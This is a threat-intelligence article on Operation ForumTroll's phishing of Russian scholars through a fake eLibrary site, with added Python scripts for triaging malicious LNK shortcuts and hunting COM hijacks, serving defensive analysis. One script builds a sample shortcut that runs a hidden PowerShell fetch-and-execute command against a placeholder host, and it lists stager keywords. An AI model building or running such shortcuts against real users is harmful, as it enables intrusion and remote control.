Phishing Attacks: How Operation ForumTroll Targets Russian Scholars (2026)

A new wave of phishing attacks is aimed at a narrow group, Russian scholars, and the lures show careful preparation and a focused intent. The campaign borrows the reputation of a trusted scientific platform to get its mail read, which raises questions about the ethics and the scale of cyber espionage.

Kaspersky, the Russian cybersecurity firm, recently documented a fresh campaign attributed to Operation ForumTroll, an actor active since at least 2022. Earlier ForumTroll phases went after organizations; this wave, detected in October 2025, turns toward individuals, in particular professors and researchers in political science, international relations and global economics at prominent Russian universities and research centers.

Why the shift? According to Kaspersky researcher Georgy Kucherin, singling out individuals points to a more strategic goal, most likely collecting highly specialized information or monitoring influential voices. That is a marked departure from the broad-brush targeting typical of most phishing.

Operation ForumTroll first drew attention for exploiting a then-zero-day Google Chrome vulnerability (CVE-2025-2783) to deploy the LeetAgent backdoor and Dante spyware. The new campaign still relies on capable tooling, but the entry point is different: carefully crafted emails posing as messages from "eLibrary", a respected Russian scientific electronic library.

The attackers registered the look-alike domain e-library[.]wiki in March 2025, roughly half a year before the first phishing mails (sent from support@e-library[.]wiki) went out. The waiting period, known as domain aging, is a deliberate evasion: reputation-based mail filters treat newly registered domains as suspicious, while a domain that has sat quietly for months looks established. Domain age alone is therefore a weak signal; the mismatch between the sender domain and the real elibrary[.]ru is the stronger one.

To complete the illusion, the attackers cloned the real eLibrary homepage (elibrary[.]ru) on the fake site. The emails urge recipients to download a plagiarism report; the link points to a ZIP archive named after the target's full Russian name (surname, first name and patronymic), which makes the lure highly personalised.

One telling detail: the download links work only once and only from a Windows device. A second request, or one from another operating system, returns a polite Russian message along the lines of "Download failed, please try again later" or a prompt to retry from a Windows PC. Single-use, OS-gated links limit the number of samples that reach analysts and sandboxes and keep the infrastructure quiet, so a responder who receives a reported mail should expect the link to be dead and should look for the archive on the recipient's machine instead.

Inside the ZIP archive is a Windows shortcut (LNK) file. Opening it runs a PowerShell script that silently fetches the next stage from a remote server; that stage installs a malicious DLL and makes it persistent through COM hijacking, a registry change that redirects a COM class to the attacker's DLL so that a legitimate process loads it. Meanwhile the user is shown a decoy PDF so that nothing appears amiss.
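The first artefact a responder can actually get hold of is the ZIP on the recipient's machine, and the LNK inside it carries the PowerShell command line in its StringData section. The following script, an added example rather than code from Kaspersky's report, parses the Shell Link header and StringData per the MS-SHLLINK format and flags shortcuts whose target and arguments look like a stager (hidden window, PowerShell with download-and-execute switches). The ZIP, the LNK, the Cyrillic file name, the hostname and the command line are all constructed here for the demonstration; the report does not quote the real command line.

```python
"""Triage a phishing ZIP whose member is a LNK that launches PowerShell (added example)."""
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
               (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
               (HAS_ICON, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # console starts minimised, so the victim never sees it
# Tokens that, in a shortcut's command line, usually mean a stager rather than a document
SUSPICIOUS = ("powershell", "-enc", "-w hidden", "-windowstyle hidden", "-nop",
              "-noprofile", "bypass", "iex", "invoke-expression", "downloadstring",
              "invoke-webrequest", "iwr ", "start-process", "rundll32", "regsvr32")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:                  # skip LinkTargetIDList: uint16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                # skip LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_cmd}
    for flag, key in STRING_DATA:           # each string: uint16 char count + chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:                               # ANSI strings use the system code page; cp1251 assumed
            out[key] = data[pos:pos + count].decode("cp1251", errors="replace")
            pos += count
    return out


def triage(lnk: dict) -> list:
    """Heuristic findings for one parsed shortcut."""
    cmdline = (lnk.get("relative_path", "") + " " + lnk.get("arguments", "")).lower()
    findings = [f"command line contains '{tok.strip()}'" for tok in SUSPICIOUS if tok in cmdline]
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    if len(lnk.get("arguments", "")) > 200:
        findings.append("unusually long argument string")
    return findings


def triage_zip(zip_bytes: bytes) -> list:
    """Open an in-memory ZIP and triage every .lnk member; returns (name, parsed, findings)."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                parsed = parse_lnk(zf.read(info))
                results.append((info.filename, parsed, triage(parsed)))
    return results


def build_lnk(relative_path: str, arguments: str, show_cmd: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal Shell Link (header + Unicode StringData) to exercise the parser."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags)
    # FileAttributes, three FILETIMEs, FileSize, IconIndex, ShowCommand, HotKey, Reserved1..3
    header += struct.pack("<IQQQIIIHHII", 0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    assert len(header) == 0x4C

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def build_sample_zip() -> bytes:
    """CONSTRUCTED lure: archive named like a target, one LNK running a hidden PowerShell stager.
    The hostname and the command are placeholders, not indicators from the report."""
    args = ('-nop -w hidden -c "iwr http://example.invalid/s.ps1 -UseBasicParsing | iex; '
            'start-process report.pdf"')
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", args)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Иванов Иван Иванович.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for name, parsed, findings in triage_zip(build_sample_zip()):
        print(name, parsed.get("relative_path"), parsed.get("arguments"), *findings, sep="\n  ")
```

On a real sample, pass the bytes of the archive to `triage_zip`; the relative path and arguments recovered from the LNK are what to pivot on (the download host, the decoy file name, any encoded command to decode next), and a ShowCommand of 7 on a shortcut that claims to be a document is itself a strong signal.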

The final stage is Tuoni, a command-and-control framework built for red teaming; on an infected Windows host it gives the operator full remote control. The implication is uncomfortable: the same toolkit serves equally well for espionage, data theft or sabotage.
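Once a host is suspected, the persistence step matters more than the stager: the COM hijack described above survives reboots and the cleanup of the original ZIP. Per-user COM registrations under HKCU\Software\Classes\CLSID take precedence over the machine-wide ones under HKLM for non-elevated processes, so a DLL path written into HKCU\...\{CLSID}\InprocServer32 is loaded by whatever legitimate process next instantiates that class. The script below, an added example and not Kaspersky's tooling, hunts for that pattern in registry exports (`reg export HKCU\Software\Classes\CLSID hkcu.reg` and the HKLM counterpart, concatenated). The .reg text, GUIDs and paths are constructed placeholders.

```python
"""Hunt for COM hijacking in .reg exports of HKCU/HKLM CLSID keys (added example)."""
import re

# Locations a standard user can write to; a COM server living here is suspect
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\",
                 "%appdata%", "%localappdata%", "%temp%")
KEY_RE = re.compile(
    r"^\[(HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)\\Software\\Classes\\CLSID\\"
    r"(\{[0-9A-Fa-f-]{36}\})\\(InprocServer32|LocalServer32)\]$")
VALUE_RE = re.compile(r'^@="(.*)"$')   # the key's default value holds the server path


def parse_reg_export(text: str) -> dict:
    """Map (hive, CLSID, server kind) -> server path, from a .reg export's default values."""
    servers, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            hive = "HKCU" if m.group(1) == "HKEY_CURRENT_USER" else "HKLM"
            current = (hive, m.group(2).upper(), m.group(3))
            continue
        if line.startswith("["):        # some other key: stop collecting values
            current = None
            continue
        v = VALUE_RE.match(line)
        if v and current:
            servers[current] = v.group(1).replace("\\\\", "\\")   # .reg escapes backslashes
    return servers


def find_hijacks(servers: dict) -> list:
    """Flag HKCU registrations that shadow an HKLM class or point into user-writable paths."""
    findings = []
    for (hive, clsid, kind), path in servers.items():
        if hive != "HKCU":
            continue
        reasons = []
        machine = servers.get(("HKLM", clsid, kind))
        if machine and machine.lower() != path.lower():
            reasons.append(f"shadows HKLM server {machine}")
        if any(tok in path.lower() for tok in USER_WRITABLE):
            reasons.append("server DLL in a user-writable location")
        if reasons:
            findings.append({"clsid": clsid, "kind": kind, "path": path, "reasons": reasons})
    return findings


# CONSTRUCTED export: one hijacked class, one benign per-user-only registration
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Windows\\System32\\legit.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\ivanov\\AppData\\Roaming\\Adobe\\update.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendor.dll"
"""

if __name__ == "__main__":
    for hit in find_hijacks(parse_reg_export(SAMPLE_REG)):
        print(hit["clsid"], hit["kind"], hit["path"], *hit["reasons"], sep="\n  ")
```

A per-user-only class with no HKLM twin is not flagged on its own, because per-user installs register classes that way legitimately; the two reasons that are checked, shadowing a machine-wide class and living in a user-writable directory, are what distinguish a hijack. Note that elevated processes ignore per-user COM registrations, so this technique typically targets the user's ordinary desktop processes.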

Kaspersky stresses that Operation ForumTroll's persistent focus on Russian and Belarusian targets means this campaign is unlikely to be the last. Its continuing operations pose a serious risk to academic and governmental communities alike.

In a related development, Positive Technologies recently reported on two other active threat clusters: QuietCrabs, believed to be a Chinese group overlapping with the activity tracked as UTA0178 or UNC5221, and Thor, which has been linked to ransomware attacks since mid-2025. Both have exploited critical vulnerabilities in widely deployed enterprise software, including Microsoft SharePoint and Ivanti products.

QuietCrabs uses its initial foothold to deploy web shells that load further payloads, among them KrustyLoader, which in turn installs the Sliver implant, an increasingly popular open-source command-and-control framework. Thor targets Russian companies with LockBit and Babuk ransomware, supplemented by legitimate remote-management tools such as Tactical RMM and MeshAgent to maintain quiet persistence.

This growing landscape of targeted attacks raises two questions: how prepared are institutions and individuals to defend against lures tailored this precisely, and has the security community fully grasped what the personalised targeting of academics implies?

Are these targeted strikes a routine part of intelligence gathering, or do they cross an ethical line?

Author: Amb. Frankie Simonis